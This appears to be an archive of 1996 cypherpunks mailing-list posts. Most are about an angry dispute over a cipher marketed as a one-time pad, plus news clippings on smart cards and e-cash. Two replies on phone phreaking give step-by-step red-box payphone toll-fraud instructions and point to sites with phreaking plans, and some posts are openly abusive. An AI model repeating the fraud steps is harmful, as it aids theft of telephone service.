one by Adam and one by myself. if you cannot understand these attacks 
what are you doing creating cryptosystems and if you can understand 
them WHY are you still calling your system secure?

Please enlihten us as to which of these two distinct cases you fall 
into, if 1. then you are a fool, if 2. then you are a stubborn fool.

 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Tue, 22 Oct 1996 09:28:38 -0700 (PDT)
To: cypher@cyberstation.net
Subject: Re: Apologies and Clarifications -
Message-ID: <846000190.16798.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



>          The assertion that an Ub must be an Rb, a truly Random bit,
>          is irrelevant ideology unless there exists the means to
>          convert the Unknown bit, Ub, into a Known bit, Kb.

This is a plainly circular argument, what you are saying is that if a 
bit cannot be predicted it can be used, yet it does not have to be 
random.

It is patently obvious to anyone with cryptographic experience and 
most people without any that to be unpredictable a stream of bits has to 
be random, otherwise if there is a correlation the next bits can be 
predicted from the previous bits. 
 
>          That is the sublime basis of the IPG algorithm, which is to
>          generate a stream of "unknown bits" which cannot be
>          analytically reconstituted in the absence of the OTP
>          generator key, and possibly other related key like
>          parameters. 

RUBBISH, yes, I know i`m shouting but I really have taken enough of 
this crap from snake oil peddlers over the years.

IF ARITHMETIC METHODS ARE USED TO CONSTRUCT A KEY THE RESULTING 
CRYPTOSYSTEM IS NOT A ONE TIME PAD.... END OF STORY

You cannot mathematically prove the security of the generator used in 
this system and are unlikely to be able to ever. whatever the case 
you can never prove the security of the whole system, the only 
provably secure system is a one time pad.

It may be predictable on output, we have already shown that it is 
vulnerable to many other cryptanalytic attacks, including Adams 
chosen plaintext attack and my timing attack.
The whole system has a number of gaping holes in it and no ammount of 
high worded twaddle is going to make it secure.

>         The additional caveat of course is that the key
>          cannot be guessed, nor can it be derived from brute force
>          methodologies, both of which are patently impossible with the
>          IPG algorithm. 

The key can probably be guessed, on first examination, which took 
about 5 minutes before I dismissed the algorithm as snakeoil, the 
generator appeared to me to be an array or linear congruential 
generators which have been cryptanalysed and proved insecure, by this 
very fact there is obviously a cryptanalytic attack waiting out there 
on the generator which produces no unpredictable state whatsoever in 
the "randomness pool"

>         You do not have to be a Stephen Hawking to
>          comprehend why that is a fact; each of you, with possible
>          minor exceptions, will be able to discern that because it
>          quickly becomes self evident as you ply the algorithm.

No, each of us has looked at the algorithm and decided that it is 
insecure, we have even proved it to you mathematically, and if your 
math was any better than high school level you would be able to 
comprehend our arguments, it is abundantly clear to me that nothing, 
not even the words of a world class cryptographer like Blaze or 
Rivest would convice you that your system is insecure, you have gone 
about creating a cryptosystem the same old way any idiot with no 
experience or knowledge of cryptography does. You have made up the 
most hideously complicated mess of data transformations you can 
imagine then constructed an inverse function to recover the data. you 
have given no thought to any complexity theoric or intuitive proof of 
the security of this algorithm, just done some irrelevant statistical 
tests on some keystream. your hope is that no-one else will be able 
to untangle this mess, you are deepy wrong.

Please get a clue.


  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Tue, 22 Oct 1996 09:44:15 -0700 (PDT)
To: cypher@cyberstation.net
Subject: Re: Q.E.D. reply to Perry Metzger
Message-ID: <846000193.16815.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> As in so many other cases, you are so F.O.S. that it is
> unbelievable. Your eminence pontificating about it does make
> it true. 

No, Mathematical proof makes it true...


 
> thus the algorithm must be attacked analytically - as EVEN you, or anyone else,
> will be able to clearly see, if you examine the algorithm, it cannot be
> attacked analytically. 

Absolute sanctimonious twaddle, the algorithm has already been 
analytically compromised by Adam Shostack with a known plaintext 
attack requiring only a few bytes of known text, I have also 
theoretically compromised the system using timing attacks, 
furthermore I believe that linear and differential cryptanalysis may 
provide an even more efficient attack, though I have yet to take the 
time to see if this is indeed true, whatever the case, the algorithm 
is broken, there is nothing more to discuss
 
> My algorithm most certainly does NOT produce a theoretical pure Random
> Number Stream, accordingly it is a PRNG, but it most certainly does
> produce an OTP that meets each and every requirement of such, other
> than some theoretical definition that you seek to impose on it by your
> dogmatic words. You do not have to take my word for it, the FULL
> ALGORITHM, which has never before been published, is set out on our web
> site.  

For the last time it is not a one time pad, it is a stream cipher, 
and furthermore it is an insecure stream cipher, soon available in a 
town near you.
 
> There is no mathematical proof that my PRNG streams are not an OTP -
> because they are OTPs. There are 156.8816 megabytes of raw encryptor
> stream data at our site. They constitute 10 OTPs, all using the same key,
> only the message numbers vary.but with different message numbers only.

As I said, they are not OTPs and they never will be, they are not 
provably secure and are therefore not a one time pad.

> You are so vane, so crass, so dogmatic, so blinded by your opinions,
> that you obviously look at yourself in the mirror wheneever given the
> opportunity. You do not know what the hell you are constantly
> pontificating about. talking about and including the one under discussion
> herein. Why not show everyone your prowess by telling us what the key and
> the As, Bs, and Cs, are they were used to generate the 156.8816 megabytes
> referred to above. Of course, you cannot, so you bray like an ass to cover
> up your crypto impotence.

Well said Perry.
 
> > >          Accordingly, obviously it is they, not us, who are
> > >          the ones that have "Nihil Est Demonstrandum," in this matter.

It appears the IPG guy needs to perfect his Latin too, the phrase is 
nihil est demonstratum - nothing has been proved (perfect tense)
There is no such Latin word as demonstandum.

> > >          While the vast majority of people knowledgeable about
> > >          cryptography have not heretofore believed that it is possible
> > >          for software to produce an OTP,

And what they know believe is that you are a fool, in addition to 
this they can prove mathematically that the system you have put 
foward is a stream cipher and not a one time pad, and that it is 
insecure.

> > The information content, or entropy, of the key stream is necessarily
> > no larger than its keyspace. That is, if you have a software
> > pseudo-random number generator using an N bit seed, the entropy of the
> > keyspace is necessarily never greater than N. This is mathematically
> > certain -- no amount of prayer on your part can change that.
> > 
> > >          that does not make it a
> > >          scientific fact,

Absolutely, your system is therefore provably not a one time pad, the 
very definition of which is that it has equal or greater state than 
the message it is used to encrypt.


> It is absolutely not perfect in the Shannon sense, but it does not have to
> be theoretically perfect to fulfill the requirement of being an OTP. You
> definition of an OTP, or a OTP as you mistakenly refer to it, is an
> extraneous mathematical definition that people have mistakenly
> extrapolated from Shannon.   

Rubbish, we have not extrapolated anything, Shannon proved in a 
statistical framework of pure mathematics that the only provably 
secure system is a true one time pad, NOT you system.

> > >          In support of their position, some have pointed out that John
> > >          von Neumann, to paraphrase, stated that ARITHMETIC cannot
> > >          produce random numbers,
> > 

<SARCASM>
So you are claiming now that your system does not use arithmetic? - 
tell us how my good man, you may well have discovered the worlds 
first non arithmeric algorithm to use a purely arithmeric machine to 
execute it.
</SARCASM>

> There you go again, pulling things out of you crazy hat, head, running
> off at the brain again, stating a falsehood and hoping that people will
> overlook it. I assume that you held a seance with von Neumann and he told
> you that from the great beyond, since that is clearly not what he said. A
> careful reading of von Neumann does not reveal that he said one thing and
> meant another. He used the word ARITHMETIC, if he meant something else he
> world have said so. Furthermore, he was referring random numbers, and to
> repeat emphatically, my algorithm is a PRNG, but  it  also happens to be
> an OTP, as we can prove. Q.E.D.    

The above passage is an oxymoron, it is plainly a contradiction in 
terms to call a PRNG an OTP.
  
> > >          We stipulate the obvious fact that the encryptor stream
> > >          generated by EUREKA is a PRNG stream, though we do consider
> > >          it gross denigration to castigate it as ONLY a PRNG stream.

It is not only a PRNG stream, it is an insecure PRNG stream as Adam 
and I have shown.

> It is a stream cipher, but it is also an OTP, just as a hardware sourced
> RNG is a stream cipher that is also an OTP.

Rubbish.

If the entropy is limited, you do not have a One Time Pad, period, end
of discussion, its over.

> And for you to claim that my contention is analogous to comparing bread
> to an automobile, petty nonsense and mindless hyperbole. 

Your whole diatribe on this subject has been utter bullshit, 
throughout the whole discussion you have made no effort to listen to 
what people have said, and you have made no effort to understand our 
attacks on your system, god only knows why we bothered, you system 
really doesn`t deserve our valuable time.

> > >          Think about that simple supposition for a moment. What do we
> > >          mean by an OTP?

An insecure stream cipher you are planning to flog to unsuspecting 
people knowing nothing about cryptography using the same mindless 
technobabble and high worded crap you have used on this list.

We have already established that your cipher is easy to
break, so your mindless babble that it is secure really don't matter.

We will ignore you from now on, you are really just an insignificant 
silly little man...

 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Perry Farrell <pneyz@armory.com>
Date: Mon, 21 Oct 1996 19:07:38 -0700 (PDT)
To: Michael B Amoruso <h2@juno.com>
Subject: Re: Blue Box Plans & hacker bbs's
In-Reply-To: <19961020.200347.3302.1.h2@juno.com>
Message-ID: <Pine.SCO.3.91.961021163645.18461F-100000@deepthought.armory.com>
MIME-Version: 1.0
Content-Type: text/plain


> I know this is my second question in a short period of time...but anyone
> got or know where to get any good blue box plans??  I cant find shit on
> the web, and I need some good hacker telnet bbs's.  Someone please give
> me either.
> 					THanks
> 					HeLiUM

As you should know, blue boxes are (with some exceptions), not operable 
in the US. If you do not live in the US, they still should not work for 
you as most foreign countries use NACTS or another standard instead of 
ACTS. In the USA, blue boxes will not work under 5ESS or several other 
recent versions of the switching system as they utilize multi-band 
signalling, meaning that if you use a blue box to drop a trunk, the line 
goes dead since the signalling is on another frequency that you cannot 
hear. It is still possible to blue box, but it requires going through 
primitive switching software like step-by-step, crossbar, or 1ESS (I 
think). It is really not worth it, a red-box is a much better bet, or 
code fraud (calling, credit, or 950/PBXes), along with op-diverting.

Still, plans can be found in almost any hacker ftp site. Try ftping to 
ftp.winternet.com in the directory /user/nitehwk/phreak.

For a list of some telnettable boards, grab the alt.2600/#hack FAQ from 
the same directory. It has a few, although no really good ones (you'll 
have to find them yourself).

					pneyz (pneyz@armory.com)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Perry Farrell <pneyz@armory.com>
Date: Mon, 21 Oct 1996 19:08:04 -0700 (PDT)
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Blue Box Plans & hacker bbs's
In-Reply-To: <199610210213.TAA28765@dfw-ix5.ix.netcom.com>
Message-ID: <Pine.SCO.3.91.961021164621.18461G-100000@deepthought.armory.com>
MIME-Version: 1.0
Content-Type: text/plain


> Also, the network's signalling has changed, and the basic 
> Captain Crunch Whistle doesn't work many places any more -
> most of the signalling is digital out-of-band rather than
> inband audio.  Phreaking isn't impossible (or there wouldn't be 
> as many people chasing the Dread Pirate Mitnick), but at this point
> you actually need to know what you're doing to succeed at it,
> and merely having plans for a device you don't know well enough to
> emulate in code on your PC isn't going to buy you much.

Very good point, phreaking's getting tricky. First of all, forget blue 
boxes, they're worthless, especially to an amateur, which you (HeLiuM) 
obviouisly are. Get a red box. Go to Radio Shack and buy a digital 
recorder pocket memo thing. They're about ten bucks and it's alot easier 
than getting a handheld DTMF dialer (which is annoying to solder because 
RS doesn't make them very well). Get BlueBeep or something 
(ftp.fc.net/pub/defcon/BLUEBEEP) and record some quarter tones. Go to a 
Bell payphone (CoCoTs and USWest phones do not work) and dial 
"1+area+npa+number", like a normal call. Then play the tones. For a local 
call, dial "10288+area+npa+number", which makes AT&T think it's along 
distance call. 

					pneyz (pneyz@armory.com)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Norman Hardy <norm@netcom.com>
Date: Mon, 21 Oct 1996 16:57:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: cypherpunks ftp site
Message-ID: <v03010500ae91bba23301@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


I am trying to get some code from <ftp.csua.berkeley.edu:pub/cypherpunks>.
I get:

ftp> get README.MIRRORS
200 PORT command successful.
425 Can't create data socket (128.32.43.51,20): Address already in use.
ftp>

Any suggestions to how to get eliptic.src and elliptic.doc reported to be
at <ftp.csua.berkeley.edu:pub/cypherpunks/ciphers>? I searched AltaVista.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair" (Time Keeper) <fair@clock.org>
Date: Mon, 21 Oct 1996 17:27:14 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Reno at FCBA
In-Reply-To: <1.5.4.32.19961021174735.0066a640@pop.pipeline.com>
Message-ID: <v0300780cae91bce08361@[17.255.9.110]>
MIME-Version: 1.0
Content-Type: text/plain


Perhaps C-SPAN can be convinced to cover this talk? Congress is not in
session, after all...

	Erik






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "gweissman@spyrus.com" <gweissman@spyrus.com>
Date: Mon, 21 Oct 1996 17:02:10 -0700 (PDT)
To: paul@fatmans.demon.co.uk
Subject: Re: OTP
In-Reply-To: <845910392.8251.0@fatmans.demon.co.uk>
Message-ID: <326BAC7A.39C6@spyrus.com>
MIME-Version: 1.0
Content-Type: text/plain


paul@fatmans.demon.co.uk wrote:
> 
> > Can you explain to me how your one time pad algorithm is any better than
> > encryption something with, say, RC4 or any other cipher using a key that
> > is the same length as the seed for your PRNG?
> 
> Well for a start there is no possible cryptanalytic (rather than
> brute force) attack on a one time pad, the system can be
> mathematically proven to be secure with a very simple bit of
> statistics.
> 
>

Ooops : there is no possible attack at all with a properly
implmented OTP cryptosystem.  There is no keyspace to "brute-force"
search.  Any message is as likely as any other.  Check Schneier.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 21 Oct 1996 16:39:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [SERDAR ARGIC] Ray Arachelian's role in massacare of 2,500,000 Moslems
In-Reply-To: <Pine.SUN.3.91.961021133058.25121B-100000@crl.crl.com>
Message-ID: <NH76VD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort <sandfort@crl.com> writes:
> 
> > I think to talk about cryptography to the San Francisco Gay and
> > Lesbian Cypherpunks is to throw beads before the swine.
> 
> Dimitri, the expression is to cast pearls before swine.  If
> you wish to be rude and insulting, at least try to avoid looking
> like an ignorant Cossack.  If you actually feel this way about
> the Bay area Cypherpunks, why have you given a provisional Yes 
> to your visit?  Smells of intellectual dishonest and cowardice
> to me.  

You have to beg. You have to grovel. You have to prove yourselves
worthy of the honor.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: crumrig@us-state.gov (by way of Tom Lojewski <thl@ProNetC.com>)
Date: Mon, 21 Oct 1996 18:21:57 -0700 (PDT)
To: cypherpunks@toad.com
Subject: GET ME OUT OF HERE - TOO!
Message-ID: <1.5.4.32.19961022012046.00821074@proxy.pronetc.com>
MIME-Version: 1.0
Content-Type: text/plain


UNSUBSCIBE







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 21 Oct 1996 16:43:59 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [NEWS] Crypto-relevant wire clippings
Message-ID: <uq76VD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


NPR's Morning Edition: Monday, October 14, 1996

'Smart Cards' Becoming Next Generation of Debit Cards

BOB EDWARDS, Host: This is Morning Edition; I'm Bob Edwards.

The next generation of plastic money is ready, with banks and credit card
issuers preparing to introduce smart cards to consumers. Smart cards use new
technology to take debit and credit cards a step further, and could replace
many of the transactions that still utilize cash.


However, Ancel Martinez of member station KQED in San Francisco, reports that
smart cards are not catching on quickly.

ANCEL MARTINEZ, Reporter: You may not have noticed it but smart cards have
been around for some time, mostly on a trial basis in various cities. VISA
tried to make them popular during the Summer Olympic Games in Atlanta. Vendors
and merchants accepted the cards, which contain a computer chip instead of the
magnetic strip. Smart cards replace the need of cash at places, from fast-food
joints to service stations.

Tom Sack [sp] at the Veri-Phone Company [sp], oversaw the installation of
hundreds of smart card terminals in Atlanta. TOM SACK, Veri-Phone Company:
What we were interested in doing was raising consumer awareness of an
alternate payment type, so what we're doing with stored value cards in general
is to move some of the coin and bank note traffic into an automated form.

ANCEL MARTINEZ: Smart cards keep track of individual bank balances, actually
storing money on their microprocessors. They're faster to use than ordinary
credit or debit cards. Sack says smart cards are better than regular cards,
which must be constantly checked for authenticity and credit limit.

TOM SACK: We're able to set up a session between the card and the terminal,
where you really have two computers talking to each other, and what they can
do is they can exchange secrets to prove each other's identity, for example.
So what this allows us to do is to actually conduct the transaction without
making the telephone call, so that we can do a transaction very inexpensively
because we have more processing power in the card itself.

ANCEL MARTINEZ: Designers and manufacturers hope to have as broad of
application as possible for smart cards. State agencies are considering the
use of smart cards for commuters to pay turnpike tolls, and as a way for
people on welfare to receive government assistance. Another target is the
booming cellular phone industry. Telecommunication companies suffer tens of
millions of dollars in losses from rampant theft, but if customers' phones use
smart cards, so key information is not embedded in the telephone itself, the
chance of fraud is greatly reduced, since the phone won't work unless the
owner inserts a smart card.

But the card's value as a security device as come under question. Belcor
Laboratories [sp] in New Jersey recently announced cryptologists discovered
hidden problems on the smart cards, which have been advertised as
tamper-proof. Bill Barr [sp] with Belcor says researchers discovered two
things.

BILL BARR, Belcor Laboratories: One, we've discovered how to manipulate a
piece of computing technology and force it to make an error; and second, we've
discovered that if it does make that error, then we can, by using our
sophisticated mathematics, figure out how to extract the key out of the
computing device, the secret.

ANCEL MARTINEZ: If a sophisticated criminal can make a copy of a legitimate
card, or if smart cards can be manipulated around the notoriously feeble
security systems of the Internet, the technology may not be any good. Some
experts, however, say there's no reason for panic. They say the Belcor study
will not slow the eventual nationwide acceptance of smart cards.

According to analyst Karen Apple [sp] at Forester Research [sp] in Cambridge,
Massachusetts, banks remain steadfast in the belief that smart cards can, and
will, reduce fraud.

KAREN APPLE, Analyst, Forester Research: The credit card industry suffers from
about a billion dollars in fraud every year as it is. I don't think it can get
much worse than that. Smart cards do provide a greater level of security than
the systems that are in place today.

ANCEL MARTINEZ: Smart cards may be a good way for banks, credit card companies
and merchants, to cut costs and save money, but smart cards are not in high
demand with the people who matter most, consumers. Again, Karen Apple-

KAREN APPLE: You have sort of a chicken-and-the-egg problem where nobody wants
to be the first to make a move. Consumers don't want to embrace smart cards
until they're accepted more widely, and merchants don't want to foot the bill
to make smart cards more widely available, or more widely accepted.

ANCEL MARTINEZ: Facing such a dilemma, retail groups, banks, financial service
companies, have formed a coalition to negotiate new technical protocols for
smart cards, as well as a means to finance the new technology. Called Smart
Card Forum, it's a who's who list of American business. Citibank,
Hewlett-Packard, American Express and Motorola are but a few, and there's a
Microsoft representative. Software companies are keen on smart cards because
they forecast that the electronic cash will set a new standard for commerce on
the Internet

For National Public Radio, I'm Ancel Martinez in San Francisco.

Associated Press: Tuesday, October 15, 1996

Online Banking: Cutting Edge or Over The Edge?

By PATRICIA LAMIELL

A future television commercial, brought to you by your bank:

Dawn creeps through the windows of a house. Logging onto his personal
computer, a young executive instructs his bank to pay bills, checks on his
investments and completes an online car loan application.

His wife calls. Away on a business trip, she has just transferred cash, via a
laptop computer, from the family's savings to their checking account.

His son charges in, late for school and bellowing about lunch money. Dad grabs
the boy's smart card - a plastic credit card look-alike embedded with a
computer chip - and swipes it through a card reader in his PC to download
electronic cash from his bank account onto the card.

Banks hope this scenario becomes reality in the not-too-distant future.
They're betting that online innovations will transform the way consumers
complete most financial transactions, from buying a cup of coffee to investing
for retirement.

About 200, or 1 percent, of financial institutions in North America currently
offer online banking, but because most large banks offer it, it is available
to 60 percent of consumer banking customers, said Jim Bruene, editor of the
OnLine Banking Report, an industry newsletter based in Seattle.

If the industry has its way, every household will be banking soon from a home
computer. "We see the numbers of online banking customers exploding from prior
years," enthuses Michael Papantoniou, vice president for electronic commerce
at Chase Manhattan Corp.

But it's not certain that consumers will take to the new technology in enough
numbers to justify the expense to banks. Dana Massie, an online client of
Wells Fargo Bank, is director of technical research for Creative Technology
Ltd., a multi-media company, and is probably as computer-savvy as banking
customers come.

But, Massie said, "I don't have a lot of patience for complicated stuff at
home. When computers are as reliable and easy to use as televisions, then they
will take off, because they're a lot more fun. But computers have to stop
crashing, they have to turn on instantly - and computers are loud."

Financial companies believe online banking will lower transaction costs and
give them an edge over competitors. They've taken studies showing that
customers like online banking because it saves them time, and that it appeals
to merchants because it saves on billing and processing costs.

But the notion of winging theoretical money through cyberspace still sends
many consumers into a panic. And it prompts questions about security and
privacy. Many people still want to handle cash and speak face-to-face with
their bankers.

A closer look at online banking:

HOW DID WE GET HERE?

Online banking actually has been around for years. "It may be one of those
overnight success stories that took 15 years to develop," quips Bob Schettino,
a spokesman for Intuit Corp., which makes the Quicken home finance software.

The huge growth in consumer purchases of PCs over the past decade has fed the
expansion of online banking. By 1995, more than 30 million households in the
United States had home computers. More than a third used some type of personal
finance software.

Intuit and other software makers figured out how users of their home finance
software could communicate via PC and modem with their banks. And the Internet
became vastly more popular and more secure, leading to the creation in October
1995 of Security First Network Bank, the first Internet-only bank.

Meanwhile, significant innovations in the smart card made it possible to carry
electronic cash and perform financial transactions from a computer or
telephone. The smart card - even more than the magnetic stripe card, which
made automatic teller machines and debit cards possible - turned on its ear
the notion that banking customers must visit a bank.

Financial institutions began using online banking to attract and keep
customers. PC owners, who as a group are young, well educated and affluent,
are prize customers indeed.

A few large banks, including Chase Manhattan Corp., Citibank, Bank of America
and Wells Fargo, developed or acquired online banking systems. Other financial
firms formed alliances with technology companies - Visa International has
teamed with Microsoft Corp., while 15 banks formed a consortium with IBM.

But online banking is still nascent. Of the 10 million households that use
Intuit software products, only about 350,000 or 3.5 percent, have signed up
for online banking, Intuit said. The American Bankers Association said about 1
percent of transactions in 1995 were completed online.

ONLINE BANKING AND YOU

What does this trend mean for the banking customer? Online banking shortens
the amount of time consumers spends on finances, and allows them to work on
them any time of the day or night. No more racing to the bank Friday afternoon
to deposit a paycheck - Chase said 40 percent of its online banking is done on
the weekend.

Some consumers have been leery of doing banking or other personal business on
the Internet, which works like a huge electronic party line, for fear someone
could steal private information. But developers of online banking technology
say new scrambling and encryption techniques have made Internet transactions
safer.

Indeed, researchers are concentrating on new applications that allow banking
and commerce directly on the Internet, as well as through online service
providers like America Online and CompuServe. They say online commerce is
safer than giving a credit card number out over the telephone.

A big stumbling block to the growth of online banking is that most vendors
such as department stores and utilities don't accept electronic payments.
Right now, this is a chicken-and-egg problem for banks - vendors are reluctant
to invest in technology that their customers won't use. Consumers are leery of
investing in technology that vendors don't accept. John Dickinson, a

self-professed computer geek and freelance magazine editor, has been doing
online banking for 12 years and pays 95 percent of his personal and business
bills that way. But he still gets into scrapes with vendors.

He said he can't get his phone company, for example, to consolidate the eight
paper bills that it sends each month for different accounts at his San
Francisco home and office.

And Pacific Gas & Electric Corp. was taking two weeks to process his payments,
and then started dunning him for being late. Three months ago, he "got really
bored with calling them up all the time, so I just threw up my hands" and got
the utility company to automatically debit his checking account each month.

WHY THE BANKS WANT IT

Financial institutions are in a life-or-death race with technology and
telecommunications companies to provide home banking services.

Electric utilities, telephone and cable companies already have lines into
homes that can transmit financial information and are trying to develop new
services. If customers can transfer money and get loans via a technology or
communications company that already has lines into their homes, why would they
need a bank?

So banks must reassert control of the banking business, or cede it to
non-financial companies. But regaining control is tricky indeed. Banks have
invested billions of dollars in technology - such as machines to read magnetic
stripes on cards - which is fast becoming obsolete. They have also built, at
tremendous expense, a lavish branch system that, while shrinking, is expensive
to maintain.

Banks have to make good on these investments before they charge into new
technologies that may themselves be quickly obsolete. They also must stay
innovative enough to keep their increasingly computer-adventurous customers.
The task is somewhat like catching a moving bus.

"By the time people get literate with PCs," said Frank Woosley, director of
financial services consulting for Deloitte & Touche in Dallas, "the smart
banks are going to take the stuff that would normally be done on a PC and
eliminate it altogether," like drafting checks, reconciling statements and
moving money between accounts.

If they are to continue to be the place where people deposit and borrow money,
banks must devise cost-effective ways to turn the new technology into programs
customers and merchants will use.

That is a tall order, even for banking powerhouses. "But if we're not doing
that," Woosley said, "we're not going to be in business much longer."


Reuters: Tuesday, October 15, 1996

Deutsche Bank Gears Up For Virtual Shopping Test

By Catherine O'Mahony

FRANKFURT-- German shoppers weary of the long queues and curt service that
typify the High Street here may soon have a more relaxing option -- virtual
shopping courtesy of the biggest bank.

Deutsche Bank AG is gearing up to test "Ecash" -- a system based around
electronic "coins" which allow the user to buy goods and services over the
Internet -- in just the third initiative of its kind worldwide.

"Cyber money" is being hyped by computer boffins as the cash of the 21st
century, although the initiators of Deutsche Bank's project are somewhat
sceptical of the hype.

"You can't expect people to change their habits overnight. This will start
with the technology freaks who go along with everything," Christof Blum, head
of Deutsche Bank's technological developments team, told Reuters.

But Blum is confident that specific services, especially media-related
products such as newspapers, magazine articles and other information, can sell
well on the Net.

Eventually, he said, "This will be pretty big."

Blum and his team are working on a six-month pilot programme expected to start
by January 1997, giving a selected group of Germans their first taste of a
virtual shopping spree, albeit with a limited choice of products.

Some 1,000 bank customers and a group of around 30 service providers, mainly
publishers, will take part.

Using software supplied by the bank, and developed by the specialist Dutch
firm Digicash NV, customers will be able to ask Deutsche Bank via their PC to
transfer funds from their regular bank account into an interim "Ecash" deposit
account.

The required amount of "electronic coins" -- denominated in deutsche marks --
can then be stored on the customer's PC hard disk, where they will be
displayed in the form of a purse icon. Payment is simple: Internet users will
be able to call up prices on screen for goods on offer and transfer the right
amount of Ecash to the vendor by clicking on the purse icon.

With even credit card acceptance still strikingly limited here, the day
Germans switch on their PCs instead of their car engines for their weekly
shopping trip is some way off. But Deutsche Bank says it wants to be ahead of
the game when it arrives.

Established in the late 19th century, the bank has been defying its stuffy
image of late by making strong efforts to modernise its products, especially
in retail banking.

Part of its modern face is a six-month old "communications centre" at its main
office for technological developments in suburban Frankfurt -- an open-plan
space where staff can surf the Internet and test out prototype equipment.

Blum, whose team is one of several at Deutsche Bank working on a variety of
innovative products, says it will decide whether or not to proceed fully with
the Net cash project on the basis of its six-month test.

If so, the bank would join a tiny group of financial institutions involved
with cybermoney -- the world pioneer is Mark Twain Bank of the U.S., which
introduced digital dollars last year. Finland's Merita Bank is also running a
test.

Deutsche Bank says it is aware of the reservations many hold about the
security of Internet cash but Blum says the Ecash software is completely
secure.

As in a regular ATM withdrawal, customers have to identify themselves to the
bank to get access to the electronic cash and the "coins" are issued with code
numbers similar to the serial numbers on regular banknotes.

Nonetheless, Deutsche Bank has involved the Bundesbank in its discussions on
the Internet project from the start.

The guardian of Germany's famously solid deutsche mark is keeping a watchful
eye on cashless payments in general amid concern that electronic commerce
could be open to abuse and that virtual money could eventually disturb world
cash flows.

The bank has also been flooded with queries on its Internet cash plans from as
far away as Japan.

Its rivals on the home market, several of whom have set up banking services on
the Internet in recent months, are also taking a keen interest, but none have
yet taken the plunge with their own initiative.



American Banker: Thursday, October 17, 1996

Amex Testing Its First Smart Card, with American Airlines

By VALERIE BLOCK

American Express Co. will join the smart card parade with a test of electronic
ticketing for American Airlines passengers.

After standing on the sidelines while the banking industry announced pilots
around the globe and the bank card associations created an industry standard,
the charge card giant is finally entering the ring.

Using technology developed by IBM Corp., the program lets passengers insert a
corporate charge card with a computer chip into a reader at American Airlines
departure gates. They would receive a boarding pass, without presenting a
paper ticket.

The chip will contain the passenger's identification and frequent-flier
number, which will be matched with ticketing information in American Airlines'
data base. The cards, with magnetic stripes, will also function as corporate
cards that may be used at any location that accepts American Express.

Most major airlines, including Continental, Delta, Northwest, and United, are
testing electronic ticketing. Lufthansa, which has such a smart card program
in Europe, may be the only carrier with one in place.

Initially the pilot program will be modest, with just "hundreds" of corporate
charge cards combining magnetic stripes with chips being issued to American
Express and IBM employees. But the plans are ambitious.

Bill Hohle, smart card technology leader, described American Express' venture
as "the first step to a comprehensive multiapplication travel and
entertainment product."

He envisions that cardholders could book travel, purchase airline tickets,
expedite car rentals and hotel check-in, and electronically insert travel
information into an expense report for reconciliation.

The pilot is to begin by mid-December at 21 U.S. airports, including ones in
New York, Los Angeles, Dallas/Fort Worth, and Chicago. American Express
provides corporate cards for IBM in the United States.

Mr. Hohle said American Express also intends to test an electronic purse
application for smaller purchases.

Rumors have it that American Express will purchase Proton, a stored value
smart card program designed by Banksys of Belgium. But Mr. Hohle said it's
"too early to discuss" those plans. Proton is in its pilot phase in several
countries in Europe.

It might seem odd that American Airlines is American Express' new partner,
given that American Express issues the cobranded Delta Sky Miles Optima Card,
while Citicorp issues the American AAdvantage card. But the charge card firm
gained a technological break from the deal.

American Airlines recently introduced a ticketless travel program, called
AAccess, that uses magnetic stripe cards. To accommodate the program, the
airline installed enhanced gate readers that can also read chip cards.

Piggybacking on that technology, American Express will avoid the costs of
installing and wiring card readers. It will also alleviate the onerous job of
persuading merchants to accept the cards.

Visa and its bank partners were forced to do that for the Visa Cash
experiment, introduced in Atlanta during the Summer Olympics. Other bank smart
card tests, such as the MasterCard program in Canberra, Australia, have been
stymied by merchant resistance.

"I see it as big win" for American Express, said James Accomando, a Fairfield
Conn.-based consultant. "Now it gets a relationship with a dominant carrier in
the U.S. that it didn't have before."

Jerome Svigals, a card industry consultant in Redwood City, Calif., called the
move a "willingness of American Express to explore new partnerships." He noted
that all the card organizations are searching for "the best way to move
forward" with smart cards.

---

